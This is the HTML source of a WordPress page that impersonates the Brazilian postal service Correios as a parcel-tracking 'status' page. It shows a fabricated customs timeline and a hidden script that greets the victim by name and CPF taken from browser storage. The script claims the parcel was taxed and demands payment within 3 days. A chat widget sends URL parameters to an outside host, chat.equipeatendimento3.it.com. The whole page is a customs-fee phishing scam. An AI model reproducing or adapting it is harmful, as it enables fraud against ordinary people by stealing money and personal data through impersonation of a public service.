<!DOCTYPE html>
<html lang="pt-BR">

<head>
	<meta charset="UTF-8">
	<title>STATUS – Envios</title>
	<meta name="robots" content="max-image-preview:large">
	<link rel="alternate" type="application/rss+xml" title="Feed para Envios »"
		href="https://consulta-envios-online.com/feed/">
	<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Envios »"
		href="https://consulta-envios-online.com/comments/feed/">

	<style id="wp-emoji-styles-inline-css">
		img.wp-smiley,
		img.emoji {
			display: inline !important;
			border: none !important;
			box-shadow: none !important;
			height: 1em !important;
			width: 1em !important;
			margin: 0 0.07em !important;
			vertical-align: -0.1em !important;
			background: none !important;
			padding: 0 !important;
		}
	</style>
	<style id="classic-theme-styles-inline-css">
		/*! This file is auto-generated */
		.wp-block-button__link {
			color: #fff;
			background-color: #32373c;
			border-radius: 9999px;
			box-shadow: none;
			text-decoration: none;
			padding: calc(.667em + 2px) calc(1.333em + 2px);
			font-size: 1.125em
		}

		.wp-block-file__button {
			background: #32373c;
			color: #fff;
			text-decoration: none
		}
	</style>
	<style id="global-styles-inline-css">
		:root {
			--wp--preset--aspect-ratio--square: 1;
			--wp--preset--aspect-ratio--4-3: 4/3;
			--wp--preset--aspect-ratio--3-4: 3/4;
			--wp--preset--aspect-ratio--3-2: 3/2;
			--wp--preset--aspect-ratio--2-3: 2/3;
			--wp--preset--aspect-ratio--16-9: 16/9;
			--wp--preset--aspect-ratio--9-16: 9/16;
			--wp--preset--color--black: #000000;
			--wp--preset--color--cyan-bluish-gray: #abb8c3;
			--wp--preset--color--white: #ffffff;
			--wp--preset--color--pale-pink: #f78da7;
			--wp--preset--color--vivid-red: #cf2e2e;
			--wp--preset--color--luminous-vivid-orange: #ff6900;
			--wp--preset--color--luminous-vivid-amber: #fcb900;
			--wp--preset--color--light-green-cyan: #7bdcb5;
			--wp--preset--color--vivid-green-cyan: #00d084;
			--wp--preset--color--pale-cyan-blue: #8ed1fc;
			--wp--preset--color--vivid-cyan-blue: #0693e3;
			--wp--preset--color--vivid-purple: #9b51e0;
			--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg, rgba(6, 147, 227, 1) 0%, rgb(155, 81, 224) 100%);
			--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg, rgb(122, 220, 180) 0%, rgb(0, 208, 130) 100%);
			--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg, rgba(252, 185, 0, 1) 0%, rgba(255, 105, 0, 1) 100%);
			--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg, rgba(255, 105, 0, 1) 0%, rgb(207, 46, 46) 100%);
			--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg, rgb(238, 238, 238) 0%, rgb(169, 184, 195) 100%);
			--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg, rgb(74, 234, 220) 0%, rgb(151, 120, 209) 20%, rgb(207, 42, 186) 40%, rgb(238, 44, 130) 60%, rgb(251, 105, 98) 80%, rgb(254, 248, 76) 100%);
			--wp--preset--gradient--blush-light-purple: linear-gradient(135deg, rgb(255, 206, 236) 0%, rgb(152, 150, 240) 100%);
			--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg, rgb(254, 205, 165) 0%, rgb(254, 45, 45) 50%, rgb(107, 0, 62) 100%);
			--wp--preset--gradient--luminous-dusk: linear-gradient(135deg, rgb(255, 203, 112) 0%, rgb(199, 81, 192) 50%, rgb(65, 88, 208) 100%);
			--wp--preset--gradient--pale-ocean: linear-gradient(135deg, rgb(255, 245, 203) 0%, rgb(182, 227, 212) 50%, rgb(51, 167, 181) 100%);
			--wp--preset--gradient--electric-grass: linear-gradient(135deg, rgb(202, 248, 128) 0%, rgb(113, 206, 126) 100%);
			--wp--preset--gradient--midnight: linear-gradient(135deg, rgb(2, 3, 129) 0%, rgb(40, 116, 252) 100%);
			--wp--preset--font-size--small: 13px;
			--wp--preset--font-size--medium: 20px;
			--wp--preset--font-size--large: 36px;
			--wp--preset--font-size--x-large: 42px;
			--wp--preset--spacing--20: 0.44rem;
			--wp--preset--spacing--30: 0.67rem;
			--wp--preset--spacing--40: 1rem;
			--wp--preset--spacing--50: 1.5rem;
			--wp--preset--spacing--60: 2.25rem;
			--wp--preset--spacing--70: 3.38rem;
			--wp--preset--spacing--80: 5.06rem;
			--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);
			--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);
			--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);
			--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);
			--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);
		}

		:where(.is-layout-flex) {
			gap: 0.5em;
		}

		:where(.is-layout-grid) {
			gap: 0.5em;
		}

		body .is-layout-flex {
			display: flex;
		}

		.is-layout-flex {
			flex-wrap: wrap;
			align-items: center;
		}

		.is-layout-flex> :is(*, div) {
			margin: 0;
		}

		body .is-layout-grid {
			display: grid;
		}

		.is-layout-grid> :is(*, div) {
			margin: 0;
		}

		:where(.wp-block-columns.is-layout-flex) {
			gap: 2em;
		}

		:where(.wp-block-columns.is-layout-grid) {
			gap: 2em;
		}

		:where(.wp-block-post-template.is-layout-flex) {
			gap: 1.25em;
		}

		:where(.wp-block-post-template.is-layout-grid) {
			gap: 1.25em;
		}

		.has-black-color {
			color: var(--wp--preset--color--black) !important;
		}

		.has-cyan-bluish-gray-color {
			color: var(--wp--preset--color--cyan-bluish-gray) !important;
		}

		.has-white-color {
			color: var(--wp--preset--color--white) !important;
		}

		.has-pale-pink-color {
			color: var(--wp--preset--color--pale-pink) !important;
		}

		.has-vivid-red-color {
			color: var(--wp--preset--color--vivid-red) !important;
		}

		.has-luminous-vivid-orange-color {
			color: var(--wp--preset--color--luminous-vivid-orange) !important;
		}

		.has-luminous-vivid-amber-color {
			color: var(--wp--preset--color--luminous-vivid-amber) !important;
		}

		.has-light-green-cyan-color {
			color: var(--wp--preset--color--light-green-cyan) !important;
		}

		.has-vivid-green-cyan-color {
			color: var(--wp--preset--color--vivid-green-cyan) !important;
		}

		.has-pale-cyan-blue-color {
			color: var(--wp--preset--color--pale-cyan-blue) !important;
		}

		.has-vivid-cyan-blue-color {
			color: var(--wp--preset--color--vivid-cyan-blue) !important;
		}

		.has-vivid-purple-color {
			color: var(--wp--preset--color--vivid-purple) !important;
		}

		.has-black-background-color {
			background-color: var(--wp--preset--color--black) !important;
		}

		.has-cyan-bluish-gray-background-color {
			background-color: var(--wp--preset--color--cyan-bluish-gray) !important;
		}

		.has-white-background-color {
			background-color: var(--wp--preset--color--white) !important;
		}

		.has-pale-pink-background-color {
			background-color: var(--wp--preset--color--pale-pink) !important;
		}

		.has-vivid-red-background-color {
			background-color: var(--wp--preset--color--vivid-red) !important;
		}

		.has-luminous-vivid-orange-background-color {
			background-color: var(--wp--preset--color--luminous-vivid-orange) !important;
		}

		.has-luminous-vivid-amber-background-color {
			background-color: var(--wp--preset--color--luminous-vivid-amber) !important;
		}

		.has-light-green-cyan-background-color {
			background-color: var(--wp--preset--color--light-green-cyan) !important;
		}

		.has-vivid-green-cyan-background-color {
			background-color: var(--wp--preset--color--vivid-green-cyan) !important;
		}

		.has-pale-cyan-blue-background-color {
			background-color: var(--wp--preset--color--pale-cyan-blue) !important;
		}

		.has-vivid-cyan-blue-background-color {
			background-color: var(--wp--preset--color--vivid-cyan-blue) !important;
		}

		.has-vivid-purple-background-color {
			background-color: var(--wp--preset--color--vivid-purple) !important;
		}

		.has-black-border-color {
			border-color: var(--wp--preset--color--black) !important;
		}

		.has-cyan-bluish-gray-border-color {at
			border-color: var(--wp--preset--color--cyan-bluish-gray) !important;
		}

		.has-white-border-color {
			border-color: var(--wp--preset--color--white) !important;
		}

		.has-pale-pink-border-color {
			border-color: var(--wp--preset--color--pale-pink) !important;
		}

		.has-vivid-red-border-color {
			border-color: var(--wp--preset--color--vivid-red) !important;
		}

		.has-luminous-vivid-orange-border-color {
			border-color: var(--wp--preset--color--luminous-vivid-orange) !important;
		}

		.has-luminous-vivid-amber-border-color {
			border-color: var(--wp--preset--color--luminous-vivid-amber) !important;
		}

		.has-light-green-cyan-border-color {
			border-color: var(--wp--preset--color--light-green-cyan) !important;
		}

		.has-vivid-green-cyan-border-color {
			border-color: var(--wp--preset--color--vivid-green-cyan) !important;
		}

		.has-pale-cyan-blue-border-color {
			border-color: var(--wp--preset--color--pale-cyan-blue) !important;
		}

		.has-vivid-cyan-blue-border-color {
			border-color: var(--wp--preset--color--vivid-cyan-blue) !important;
		}

		.has-vivid-purple-border-color {
			border-color: var(--wp--preset--color--vivid-purple) !important;
		}

		.has-vivid-cyan-blue-to-vivid-purple-gradient-background {
			background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;
		}

		.has-light-green-cyan-to-vivid-green-cyan-gradient-background {
			background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;
		}

		.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background {
			background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;
		}

		.has-luminous-vivid-orange-to-vivid-red-gradient-background {
			background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;
		}

		.has-very-light-gray-to-cyan-bluish-gray-gradient-background {
			background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;
		}

		.has-cool-to-warm-spectrum-gradient-background {
			background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;
		}

		.has-blush-light-purple-gradient-background {
			background: var(--wp--preset--gradient--blush-light-purple) !important;
		}

		.has-blush-bordeaux-gradient-background {
			background: var(--wp--preset--gradient--blush-bordeaux) !important;
		}

		.has-luminous-dusk-gradient-background {
			background: var(--wp--preset--gradient--luminous-dusk) !important;
		}

		.has-pale-ocean-gradient-background {
			background: var(--wp--preset--gradient--pale-ocean) !important;
		}

		.has-electric-grass-gradient-background {
			background: var(--wp--preset--gradient--electric-grass) !important;
		}

		.has-midnight-gradient-background {
			background: var(--wp--preset--gradient--midnight) !important;
		}

		.has-small-font-size {
			font-size: var(--wp--preset--font-size--small) !important;
		}

		.has-medium-font-size {
			font-size: var(--wp--preset--font-size--medium) !important;
		}

		.has-large-font-size {
			font-size: var(--wp--preset--font-size--large) !important;
		}

		.has-x-large-font-size {
			font-size: var(--wp--preset--font-size--x-large) !important;
		}

		:where(.wp-block-post-template.is-layout-flex) {
			gap: 1.25em;
		}

		:where(.wp-block-post-template.is-layout-grid) {
			gap: 1.25em;
		}

		:where(.wp-block-columns.is-layout-flex) {
			gap: 2em;
		}

		:where(.wp-block-columns.is-layout-grid) {
			gap: 2em;
		}

		:root :where(.wp-block-pullquote) {
			font-size: 1.5em;
			line-height: 1.6;
		}
	</style>
	<link rel="stylesheet" id="hello-elementor-css" href="css/pGSmYMGrCYpz.css" media="all">
	<link rel="stylesheet" id="hello-elementor-theme-style-css" href="css/ndnItCc3NQXd.css" media="all">
	<link rel="stylesheet" id="hello-elementor-header-footer-css" href="css/ycC8ayGhlSG8.css" media="all">
	<link rel="stylesheet" id="elementor-frontend-css" href="css/JlxRfmaXOqjr.css" media="all">
	<link rel="stylesheet" id="elementor-post-24-css" href="css/4ljEy9Z3fq42.css" media="all">
	<link rel="stylesheet" id="swiper-css" href="css/c7Dw0A8peT8H.css" media="all">
	<link rel="stylesheet" id="elementor-pro-css" href="css/KUKBrbGmk9OI.css" media="all">
	<link rel="stylesheet" id="font-awesome-5-all-css" href="css/UsF1ZgOxZXok.css" media="all">
	<link rel="stylesheet" id="font-awesome-4-shim-css" href="css/DSlvAzqWhmHN.css" media="all">
	<link rel="stylesheet" id="elementor-global-css" href="css/ZrZqGOeFygtD.css" media="all">
	<link rel="stylesheet" id="elementor-post-198-css" href="css/ytSJBTkhgiU9.css" media="all">
	<link rel="stylesheet" id="google-fonts-1-css"
		href="https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=swap&ver=6.6.2"
		media="all">
	<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
	<script src="js/pnhvaPlDffZj.js" id="font-awesome-4-shim-js"></script>
	<link rel="https://api.w.org/" href="https://consulta-envios-online.com/wp-json/">
	<link rel="alternate" title="JSON" type="application/json"
		href="https://consulta-envios-online.com/wp-json/wp/v2/pages/198">
	<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://consulta-envios-online.com/xmlrpc.php?rsd">
	<meta name="generator" content="WordPress 6.6.2">
	<link rel="canonical" href="https://consulta-envios-online.com/status/">
	<link rel="shortlink" href="https://consulta-envios-online.com/?p=198">
	<link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed"
		href="https://consulta-envios-online.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fconsulta-envios-online.com%2Fstatus%2F">
	<link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed"
		href="https://consulta-envios-online.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fconsulta-envios-online.com%2Fstatus%2F&format=xml">
	<script>
		if (typeof window.typebotWpUser === "undefined") {
			window.typebotWpUser = {
				"WP ID": "0",
				"WP Username": "",
				"WP Email": "",
				"WP First name": "",
				"WP Last name": ""
			}
		}
	</script>
	<meta name="generator"
		content="Elementor 3.23.4; features: e_optimized_css_loading, e_font_icon_svg, additional_custom_breakpoints, e_optimized_control_loading, e_lazyload, e_element_cache; settings: css_print_method-external, google_font-enabled, font_display-swap">
	<style>
		.e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload),
		.e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload) * {
			background-image: none !important;
		}

		@media screen and (max-height: 1024px) {

			.e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload),
			.e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload) * {
				background-image: none !important;
			}
		}

		@media screen and (max-height: 640px) {

			.e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload),
			.e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload) * {
				background-image: none !important;
			}
		}
	</style>
	<link rel="icon" href="images/72ySPYFMWMIk.png" sizes="32x32">
	<link rel="icon" href="images/AJN08TuX89Kw.png" sizes="192x192">
	<link rel="apple-touch-icon" href="images/AJN08TuX89Kw.png">
	<meta name="msapplication-TileImage"
		content="https://consulta-envios-online.com/wp-content/uploads/2024/09/correios-sf.png">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover">
	<script src="js/Yr9oSlXkR9Ic.js" defer=""></script>
</head>

<body
	class="page-template page-template-elementor_canvas page page-id-198 wp-custom-logo elementor-default elementor-template-canvas elementor-kit-24 elementor-page elementor-page-198">
	<div data-elementor-type="wp-page" data-elementor-id="198" class="elementor elementor-198"
		data-elementor-post-type="page">
		<div class="elementor-element elementor-element-2cb0066 e-con-full e-flex e-con e-parent e-lazyloaded"
			data-id="2cb0066" data-element_type="container" data-settings="{" background_background":"classic"}"="">
			<div class="elementor-element elementor-element-98978c7 elementor-widget elementor-widget-button"
				data-id="98978c7" data-element_type="widget" data-widget_type="button.default">
				<div class="elementor-widget-container">
					<div class="elementor-button-wrapper">
						<a class="elementor-button elementor-button-link elementor-size-sm" href="#">
							<span class="elementor-button-content-wrapper">
								<span class="elementor-button-icon">
									<svg aria-hidden="true" class="e-font-icon-svg e-fas-caret-down"
										viewBox="0 0 320 512" xmlns="http://www.w3.org/2000/svg">
										<path
											d="M31.3 192h257.3c17.8 0 26.7 21.5 14.1 34.1L174.1 354.8c-7.8 7.8-20.5 7.8-28.3 0L17.2 226.1C4.6 213.5 13.5 192 31.3 192z">
										</path>
									</svg> </span>
								<span class="elementor-button-text">Acessibilidade</span>
							</span>
						</a>
					</div>
				</div>
			</div>
		</div>
		<div class="elementor-element elementor-element-ca3f49e e-con-full e-flex e-con e-parent e-lazyloaded"
			data-id="ca3f49e" data-element_type="container" data-settings="{" background_background":"classic"}"="">
			<div class="elementor-element elementor-element-c47be26 elementor-view-default elementor-widget elementor-widget-icon"
				data-id="c47be26" data-element_type="widget" data-widget_type="icon.default">
				<div class="elementor-widget-container">
					<div class="elementor-icon-wrapper">
						<div class="elementor-icon">
							<svg aria-hidden="true" class="e-font-icon-svg e-fas-bars" viewBox="0 0 448 512"
								xmlns="http://www.w3.org/2000/svg">
								<path
									d="M16 132h416c8.837 0 16-7.163 16-16V76c0-8.837-7.163-16-16-16H16C7.163 60 0 67.163 0 76v40c0 8.837 7.163 16 16 16zm0 160h416c8.837 0 16-7.163 16-16v-40c0-8.837-7.163-16-16-16H16c-8.837 0-16 7.163-16 16v40c0 8.837 7.163 16 16 16zm0 160h416c8.837 0 16-7.163 16-16v-40c0-8.837-7.163-16-16-16H16c-8.837 0-16 7.163-16 16v40c0 8.837 7.163 16 16 16z">
								</path>
							</svg>
						</div>
					</div>
				</div>
			</div>
			<div class="elementor-element elementor-element-bd311db elementor-widget__width-initial elementor-widget elementor-widget-image"
				data-id="bd311db" data-element_type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
					<style>
						/*! elementor - v3.23.0 - 05-08-2024 */
						.elementor-widget-image {
							text-align: center
						}

						.elementor-widget-image a {
							display: inline-block
						}

						.elementor-widget-image a img[src$=".svg"] {
							width: 48px
						}

						.elementor-widget-image img {
							vertical-align: middle;
							display: inline-block
						}
					</style> <a href="https://consulta-envios-online.com/">
						<img decoding="async" width="445" height="91" src="images/eWjJ5u18FmTl.svg"
							class="attachment-large size-large wp-image-33" alt=""> </a>
				</div>
			</div>
		</div>
		<div class="elementor-element elementor-element-2fcb4c5 e-flex e-con-boxed e-con e-parent" data-id="2fcb4c5"
			data-element_type="container" data-settings="{" background_background":"classic"}"="">
			<div class="e-con-inner">
				<div class="elementor-element elementor-element-1665489 e-con-full e-flex e-con e-child"
					data-id="1665489" data-element_type="container">
					<div class="elementor-element elementor-element-5bc6139 elementor-widget elementor-widget-shortcode"
						data-id="5bc6139" data-element_type="widget" data-widget_type="shortcode.default">
						<div class="elementor-widget-container">
						</div>
					</div>
					<div class="elementor-element elementor-element-1d16301 elementor-widget elementor-widget-shortcode"
						data-id="1d16301" data-element_type="widget" data-widget_type="shortcode.default">
						<div class="elementor-widget-container">
							<div class="elementor-shortcode"><typebot-standard id="KPGVgo3dEL"
									style="width: 100%; height: 600px;"></typebot-standard>
								<script type="module">
									import Typebot from "https://cdn.jsdelivr.net/npm/@typebot.io/js@0.3.4/dist/web.js"

									const urlParams = new URLSearchParams(window.location.search);
									const queryParams = Object.fromEntries(urlParams.entries());

									Typebot.initStandard({ apiHost: "https://chat.equipeatendimento3.it.com", typebot: "seusobjenc-shop-fr", prefilledVariables: { ...window.typebotWpUser, ...queryParams } });</script>
							</div>
						</div>
					</div>
					<div class="elementor-element elementor-element-ed54323 elementor-hidden-desktop elementor-hidden-tablet elementor-hidden-mobile elementor-widget elementor-widget-html"
						data-id="ed54323" data-element_type="widget" data-widget_type="html.default">
						<div class="elementor-widget-container">
							<!-- Página de Status -->

							<p id="mensagem-status">Nenhum dado encontrado.</p>

							<script>
								// Recuperar dados do localStorage
								const nome = localStorage.getItem('nome');
								const cpf = localStorage.getItem('cpf');

								// Exibir a mensagem na página
								const mensagemElemento = document.getElementById('mensagem-status');

								if (mensagemElemento) {
									if (nome && cpf) {
										mensagemElemento.innerHTML = `
                <p>Olá, ${nome}</p>
                <p>CPF: ${cpf}</p>
                <p>Seu pedido passou por um processo na alfândega e foi taxado.</p>
                <p>Por gentileza, solicitamos a realização do pagamento da taxa, para que, consecutivamente, possamos dar prosseguimento ao envio do seu produto, no prazo de 3 dias úteis.</p>
                O pagamento deve ser feito <u>clicando no botão abaixo:</u>

`;
									} else {
										mensagemElemento.innerText = 'Nenhum dado encontrado.';
									}
								}

								// Opcional: Limpar o localStorage após exibir os dados, se desejar
								// localStorage.removeItem('nome');
								// localStorage.removeItem('cpf');
							</script>
						</div>
					</div>
					<div class="elementor-element elementor-element-f996ba6 elementor-align-center elementor-hidden-desktop elementor-hidden-tablet elementor-hidden-mobile elementor-widget elementor-widget-button"
						data-id="f996ba6" data-element_type="widget" data-widget_type="button.default">
						<div class="elementor-widget-container">
							<div class="elementor-button-wrapper">
								<a class="elementor-button elementor-button-link elementor-size-sm" href="#">
									<span class="elementor-button-content-wrapper">
										<span class="elementor-button-text">Efetuar o Pagamento</span>
									</span>
								</a>
							</div>
						</div>
					</div>
					<div class="elementor-element elementor-element-d70c34d elementor-hidden-desktop elementor-hidden-tablet elementor-hidden-mobile elementor-widget elementor-widget-heading"
						data-id="d70c34d" data-element_type="widget" data-widget_type="heading.default">
						<div class="elementor-widget-container">
							<style>
								/*! elementor - v3.23.0 - 05-08-2024 */
								.elementor-heading-title {
									padding: 0;
									margin: 0;
									line-height: 1
								}

								.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a {
									color: inherit;
									font-size: inherit;
									line-height: inherit
								}

								.elementor-widget-heading .elementor-heading-title.elementor-size-small {
									font-size: 15px
								}

								.elementor-widget-heading .elementor-heading-title.elementor-size-medium {
									font-size: 19px
								}

								.elementor-widget-heading .elementor-heading-title.elementor-size-large {
									font-size: 29px
								}

								.elementor-widget-heading .elementor-heading-title.elementor-size-xl {
									font-size: 39px
								}

								.elementor-widget-heading .elementor-heading-title.elementor-size-xxl {
									font-size: 59px
								}
							</style>
							<h2 class="elementor-heading-title elementor-size-default">PRAZO DE ENTREGA APÓS O
								PAGAMENTO: 3 DIAS ÚTEIS
							</h2>
						</div>
					</div>
					<div class="elementor-element elementor-element-66fe077 e-con-full elementor-hidden-desktop elementor-hidden-tablet elementor-hidden-mobile e-flex e-con e-child"
						data-id="66fe077" data-element_type="container">
						<div class="elementor-element elementor-element-716765c elementor-position-left elementor-position-left elementor-vertical-align-middle elementor-widget-mobile__width-initial elementor-vertical-align-top elementor-widget elementor-widget-image-box"
							data-id="716765c" data-element_type="widget" data-widget_type="image-box.default">
							<div class="elementor-widget-container">
								<style>
									/*! elementor - v3.23.0 - 05-08-2024 */
									.elementor-widget-image-box .elementor-image-box-content {
										width: 100%
									}

									@media (min-width:768px) {

										.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,
										.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper {
											display: flex
										}

										.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper {
											text-align: end;
											flex-direction: row-reverse
										}

										.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper {
											text-align: start;
											flex-direction: row
										}

										.elementor-widget-image-box.elementor-position-top .elementor-image-box-img {
											margin: auto
										}

										.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper {
											align-items: flex-start
										}

										.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper {
											align-items: center
										}

										.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper {
											align-items: flex-end
										}
									}

									@media (max-width:767px) {
										.elementor-widget-image-box .elementor-image-box-img {
											margin-left: auto !important;
											margin-right: auto !important;
											margin-bottom: 15px
										}
									}

									.elementor-widget-image-box .elementor-image-box-img {
										display: inline-block
									}

									.elementor-widget-image-box .elementor-image-box-title a {
										color: inherit
									}

									.elementor-widget-image-box .elementor-image-box-wrapper {
										text-align: center
									}

									.elementor-widget-image-box .elementor-image-box-description {
										margin: 0
									}
								</style>
								<div class="elementor-image-box-wrapper">
									<figure class="elementor-image-box-img"><img decoding="async" width="180"
											height="180" src="images/AJN08TuX89Kw.png"
											class="attachment-full size-full wp-image-258" alt=""
											srcset="images/AJN08TuX89Kw.png 180w, images/72ySPYFMWMIk.png 150w"
											sizes="(max-width: 180px) 100vw, 180px"></figure>
									<div class="elementor-image-box-content">
										<h3 class="elementor-image-box-title">PACKET STANDARD IMPORTAÇÃO</h3>
										<p class="elementor-image-box-description">Previsão de entrega: 04/09/2024</p>
									</div>
								</div>
							</div>
						</div>
						<div class="elementor-element elementor-element-7361d63 elementor-position-left elementor-vertical-align-top elementor-widget elementor-widget-image-box"
							data-id="7361d63" data-element_type="widget" data-widget_type="image-box.default">
							<div class="elementor-widget-container">
								<div class="elementor-image-box-wrapper">
									<figure class="elementor-image-box-img"><img decoding="async" width="96" height="96"
											src="images/lBpJUHQeOe7j.png" class="attachment-full size-full wp-image-257"
											alt=""></figure>
									<div class="elementor-image-box-content">
										<h3 class="elementor-image-box-title">Fiscalização aduaneira concluída -
											aguardando pagamento</h3>
										<p class="elementor-image-box-description">Curitiba - PR<br>

											31/08/2024, 10:17:47</p>
									</div>
								</div>
							</div>
						</div>
						<div class="elementor-element elementor-element-c6de72b elementor-position-left elementor-vertical-align-top elementor-widget elementor-widget-image-box"
							data-id="c6de72b" data-element_type="widget" data-widget_type="image-box.default">
							<div class="elementor-widget-container">
								<div class="elementor-image-box-wrapper">
									<figure class="elementor-image-box-img"><img loading="lazy" decoding="async"
											width="96" height="96" src="images/bs8579mCOSgs.png"
											class="attachment-full size-full wp-image-256" alt=""></figure>
									<div class="elementor-image-box-content">
										<h3 class="elementor-image-box-title">Informações enviadas para análise da
											autoridade aduaneira/órgãos anuentes</h3>
										<p class="elementor-image-box-description">Curitiba - PR<br>

											30/08/2024, 18:01:54</p>
									</div>
								</div>
							</div>
						</div>
						<div class="elementor-element elementor-element-f3d704e elementor-position-left elementor-vertical-align-top elementor-widget elementor-widget-image-box"
							data-id="f3d704e" data-element_type="widget" data-widget_type="image-box.default">
							<div class="elementor-widget-container">
								<div class="elementor-image-box-wrapper">
									<figure class="elementor-image-box-img"><img loading="lazy" decoding="async"
											width="64" height="64" src="images/BaNZzxwia2sg.png"
											class="attachment-full size-full wp-image-255" alt=""></figure>
									<div class="elementor-image-box-content">
										<h3 class="elementor-image-box-title">Objeto recebido pelos Correios do Brasil
										</h3>
										<p class="elementor-image-box-description">Curitiba - PR<br>

											30/08/2024, 15:39:14</p>
									</div>
								</div>
							</div>
						</div>
						<div class="elementor-element elementor-element-24ce169 elementor-position-left elementor-vertical-align-top elementor-widget elementor-widget-image-box"
							data-id="24ce169" data-element_type="widget" data-widget_type="image-box.default">
							<div class="elementor-widget-container">
								<div class="elementor-image-box-wrapper">
									<figure class="elementor-image-box-img"><img loading="lazy" decoding="async"
											width="96" height="96" src="images/2JnlbNRhO8EZ.png"
											class="attachment-full size-full wp-image-254" alt=""></figure>
									<div class="elementor-image-box-content">
										<h3 class="elementor-image-box-title">Objeto postado</h3>
										<p class="elementor-image-box-description">CHINA<br>

											27/08/2024, 09:49:46</p>
									</div>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
		<div class="elementor-element elementor-element-9333a54 e-flex e-con-boxed e-con e-parent" data-id="9333a54"
			data-element_type="container" data-settings="{" background_background":"classic"}"="">
			<div class="e-con-inner">
				<div class="elementor-element elementor-element-05f6d00 e-con-full e-flex e-con e-child"
					data-id="05f6d00" data-element_type="container">
					<div class="elementor-element elementor-element-f7d78e8 elementor-widget elementor-widget-heading"
						data-id="f7d78e8" data-element_type="widget" data-widget_type="heading.default">
						<div class="elementor-widget-container">
							<h2 class="elementor-heading-title elementor-size-default">Sobre Correios</h2>
						</div>
					</div>
					<div class="elementor-element elementor-element-8ada56f elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list"
						data-id="8ada56f" data-element_type="widget" data-widget_type="icon-list.default">
						<div class="elementor-widget-container">
							<ul class="elementor-icon-list-items">
								<li class="elementor-icon-list-item">
									<span class="elementor-icon-list-text">Identidade corporativa</span>
								</li>
								<li class="elementor-icon-list-item">
									<span class="elementor-icon-list-text">Código de ética</span>
								</li>
								<li class="elementor-icon-list-item">
									<span class="elementor-icon-list-text">Política de Privacidade e Notas Legais</span>
								</li>
							</ul>
						</div>
					</div>
					<div class="elementor-element elementor-element-c58ecb7 elementor-widget elementor-widget-heading"
						data-id="c58ecb7" data-element_type="widget" data-widget_type="heading.default">
						<div class="elementor-widget-container">
							<h2 class="elementor-heading-title elementor-size-default">© Copyright 2025 Correios</h2>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>
	<script type="text/javascript">
		const lazyloadRunObserver = () => {
			const lazyloadBackgrounds = document.querySelectorAll(`.e-con.e-parent:not(.e-lazyloaded)`);
			const lazyloadBackgroundObserver = new IntersectionObserver((entries) => {
				entries.forEach((entry) => {
					if (entry.isIntersecting) {
						let lazyloadBackground = entry.target;
						if (lazyloadBackground) {
							lazyloadBackground.classList.add('e-lazyloaded');
						}
						lazyloadBackgroundObserver.unobserve(entry.target);
					}
				});
			}, { rootMargin: '200px 0px 200px 0px' });
			lazyloadBackgrounds.forEach((lazyloadBackground) => {
				lazyloadBackgroundObserver.observe(lazyloadBackground);
			});
		};
		const events = [
			'DOMContentLoaded',
			'elementor/lazyload/observe',
		];
		events.forEach((event) => {
			document.addEventListener(event, lazyloadRunObserver);
		});
	</script>
	<script src="js/9p3Gw9nS4tRs.js" id="hello-theme-frontend-js"></script>
	<script src="js/aMoK6J9WvAHl.js" id="elementor-pro-webpack-runtime-js"></script>
